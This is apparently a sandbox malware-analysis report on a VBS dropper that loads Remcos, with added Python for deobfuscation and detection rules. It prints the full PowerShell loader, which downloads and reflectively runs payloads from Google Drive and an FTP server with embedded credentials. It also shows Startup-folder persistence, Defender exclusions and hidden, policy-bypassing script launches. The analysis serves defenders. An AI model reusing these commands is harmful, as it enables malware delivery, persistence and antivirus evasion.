Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"
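The stage-1 command line above (-command "$qKKzc = 'OwB9' + [char]65 + ...") and the stage-2 script it spawns rely on a few cheap obfuscations that are worth unwinding by hand once: single-quoted fragments joined with [char]65 so the letter A never appears literally, a base64 blob of UTF-16LE text that is the stage-2 script written backwards (the first fragment 'OwB9' decodes to ";}", the last two characters of the stage-2 command shown above), Replace('?:?', 'A') applied to the downloaded payload before FromBase64String, a reversed C2 URL handed to the loaded assembly, and a -join [char[]](...) array for the FTP user name. The Python below is an added example, not part of the Joe Sandbox report or of the sample itself. Its input is the leading part of the reported stage-1 command line (the report truncates the line, so only the tail of stage 2 comes back), the blob fed to the '?:?' helper is constructed, and the function names are the example's own.

```python
"""Unwind the obfuscation layers of the PowerShell stages listed in this report.

Added example, not part of the Joe Sandbox report or of the sample. SAMPLE is the leading
part of the reported stage-1 "-command" argument (the report truncates the line), so only
the tail of the stage-2 script comes back; the stage-2 helpers use constructed inputs.
"""
import base64
import re

SAMPLE = (
    "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + "
    "[char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + "
    "'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + "
    "[char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + "
    "'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + "
    "[char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + "
    "[char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + "
    "[char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + "
    "[char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + "
    "[char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + "
    "[char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + "
    "[char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + "
    "[char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + "
    "[char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K'"
)

# A PowerShell single-quoted literal ('' is an escaped quote inside it) or a [char]N cast.
_TOKEN = re.compile(r"'((?:[^']|'')*)'|\[char\]\s*(\d+)")


def fold_concatenation(expr: str) -> str:
    """Evaluate an expression made only of 'literals' and [char]N joined with '+'."""
    parts = []
    for m in _TOKEN.finditer(expr):
        if m.group(1) is not None:
            parts.append(m.group(1).replace("''", "'"))
        else:
            parts.append(chr(int(m.group(2))))
    return "".join(parts)


def decode_utf16_base64(b64: str) -> str:
    """Base64 -> UTF-16LE text (the -EncodedCommand convention), tolerating a truncated tail."""
    b64 = re.sub(r"[^A-Za-z0-9+/=]", "", b64)
    b64 = b64[: len(b64) - len(b64) % 4]          # whole 4-character groups only
    raw = base64.b64decode(b64)
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")  # whole code units only


def unwind_stage1(expr: str) -> str:
    """Stage 1: fold the [char]65 concatenation, base64/UTF-16LE decode, reverse the text."""
    return decode_utf16_base64(fold_concatenation(expr))[::-1]


def restore_stage2_blob(downloaded: str) -> bytes:
    """Stage 2 runs $blob.Replace('?:?', 'A') before FromBase64String; do the same."""
    return base64.b64decode(downloaded.replace("?:?", "A"))


def reverse_string(s: str) -> str:
    """Stage 2 passes the loaded assembly its URL written backwards."""
    return s[::-1]


def join_char_array(codes: str) -> str:
    """Evaluate the '-join [char[]](100,101,...)' idiom stage 2 uses for the FTP user name."""
    return "".join(chr(int(c)) for c in codes.split(","))


# Constructed stand-in for a downloaded blob: base64 of an 8-byte MZ header with 'A' -> '?:?'.
STAGE2_SAMPLE = "TVqQ?:??:?M?:??:??:??:?="

if __name__ == "__main__":
    print(unwind_stage1(SAMPLE))
    print(reverse_string("txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth"))
    print(restore_stage2_blob(STAGE2_SAMPLE)[:2])
    print(join_char_array("100,101,115,99,107,118,98,114,97,116,49"))
```

Decoding the reported prefix yields the closing part of the stage-2 command exactly as the report lists it ( 'txt.db/...sptth' , $huUPX , 'D DD' ) );};), which is how one confirms the base64/UTF-16LE/reverse reading rather than guessing at it; the character array resolves to desckvbrat1, the same user that appears in the ftp:// URL.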
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown    Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
Source: C:\Windows\System32\cmd.exe    Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe    Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown    Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
Source: C:\Windows\System32\cmd.exe    Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe    Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
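The process-creation rows above carry the behaviours a detection engineer would alert on in this chain: Add-MpPreference exclusions for the PowerShell directory and for RegAsm.exe, dropped scripts run from the user's LocalLow profile with -ExecutionPolicy Bypass and -WindowStyle Hidden, RegAsm.exe started by powershell.exe with no assembly to register (the injection host; RegAsm normally takes a DLL path), the original .vbs copied to the Startup folder and later removed with cmd /c del, and the Rmc-52K54M mutex created by the RegAsm.exe process. One detail matters for rule writing: the sample's launcher passes -Comman, not -Command. PowerShell resolves any unambiguous parameter prefix, so the switch works, and a rule that matches the literal string -Command misses it; the same holds for -ep and -w in place of -ExecutionPolicy and -WindowStyle. The Python below is an added example, not part of the Joe Sandbox report. It runs prefix-tolerant versions of these checks over events constructed from the command lines listed in this report (two trimmed to the relevant fragment and marked as such) plus one constructed benign control; rule names and the event layout are the example's own.

```python
"""Behaviour rules over the process-creation and mutex rows of this report.

Added example, not part of the Joe Sandbox report. EVENTS is constructed from the command
lines the report lists (two are trimmed to the relevant fragment and marked as such); the
parent/child pairs follow the report's "Source: ... Process created: ..." rows.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the creating process
    image: str    # image path of the created process
    cmdline: str  # command line as logged


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

EVENTS = [
    # 0: wscript -> powershell; leading fragment of the [char]65-concatenated stage-1 command
    ProcEvent(r"C:\Windows\System32\wscript.exe", PS,
              r"powershell.exe -command $qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck'"),
    # 1: Defender exclusion for the PowerShell directory (RegAsm.exe gets the same treatment)
    ProcEvent(PS, PS, r"powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;"),
    # 2: dropped script run from LocalLow with the execution policy bypassed
    ProcEvent(PS, PS, r'powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"'),
    # 3: persistence launcher; "-Comman" is the sample's spelling, accepted by PowerShell as a prefix of -Command
    ProcEvent(CMD, PS, r"""Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit"""),
    # 4: self-deletion of the original dropper
    ProcEvent(PS, CMD, r'cmd.exe /c del "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"'),
    # 5: RegAsm.exe started with no assembly to register: the Remcos injection host
    ProcEvent(PS, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'),
    # 6: Startup-folder copy; fragment of the stage-2 command line
    ProcEvent(PS, PS, r"""Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force"""),
    # 7: constructed benign control, not from the report
    ProcEvent(r"C:\Windows\explorer.exe", PS, r"powershell.exe -File C:\Scripts\inventory.ps1"),
]


def _image_name(path: str) -> str:
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def _no_arguments(cmdline: str, image: str) -> bool:
    """True when the command line is nothing but the image path, quoted or not."""
    return cmdline.strip().strip('"').lower().endswith(_image_name(image))


# PowerShell resolves unambiguous parameter prefixes (-ep, -w, -Comman), so the patterns
# below anchor on the prefix rather than on the fully spelled parameter name.
RULES = {
    "defender_exclusion_added":
        lambda e: re.search(r"Add-MpPreference\b.*-Exclusion", e.cmdline, re.I) is not None,
    "execution_policy_bypass":
        lambda e: re.search(r"-(ex\w*|ep)\s+bypass", e.cmdline, re.I) is not None,
    "hidden_window":
        lambda e: re.search(r"-w\w*\s+hidden", e.cmdline, re.I) is not None,
    "char_concat_obfuscation":
        lambda e: len(re.findall(r"\[char\]\s*\d+", e.cmdline, re.I)) >= 3,
    "script_run_from_appdata":
        lambda e: re.search(r"\\AppData\\.*\.ps1", e.cmdline, re.I) is not None,
    "copy_to_startup_folder":
        lambda e: re.search(r"Copy-Item\b.*\\Start Menu\\Programs\\Startup", e.cmdline, re.I) is not None,
    "regasm_without_assembly_from_powershell":
        lambda e: _image_name(e.image) == "regasm.exe"
        and _image_name(e.parent) == "powershell.exe"
        and _no_arguments(e.cmdline, e.image),
    "self_delete_via_cmd":
        lambda e: _image_name(e.image) == "cmd.exe"
        and re.search(r"/c\s+del\b.*\.(vbs|js|ps1|bat|cmd)\b", e.cmdline, re.I) is not None,
}


def evaluate(events):
    """Map each rule name to the indices of the events it fires on."""
    hits = {name: [] for name in RULES}
    for idx, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits[name].append(idx)
    return hits


def flagged(events):
    """Indices of events that trip at least one rule."""
    return sorted({i for idxs in evaluate(events).values() for i in idxs})


def is_remcos_style_mutex(name: str) -> bool:
    """Remcos names its mutex 'Rmc-' plus a short alphanumeric tag ('Rmc-52K54M' in this report)."""
    return re.fullmatch(r"Rmc-[A-Za-z0-9]{5,8}", name.rsplit("\\", 1)[-1]) is not None


if __name__ == "__main__":
    for name, idxs in evaluate(EVENTS).items():
        print(f"{name:42s} events {idxs}")
    print("flagged:", flagged(EVENTS))
```

Every event taken from the report trips at least one rule and the benign control trips none; the two Add-MpPreference rows are the highest-value signal, since a Defender exclusion on the PowerShell directory or on RegAsm.exe has no legitimate reason to be set from an unprivileged script.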
Source: C:\Windows\System32\wscript.exe    Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mlang.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
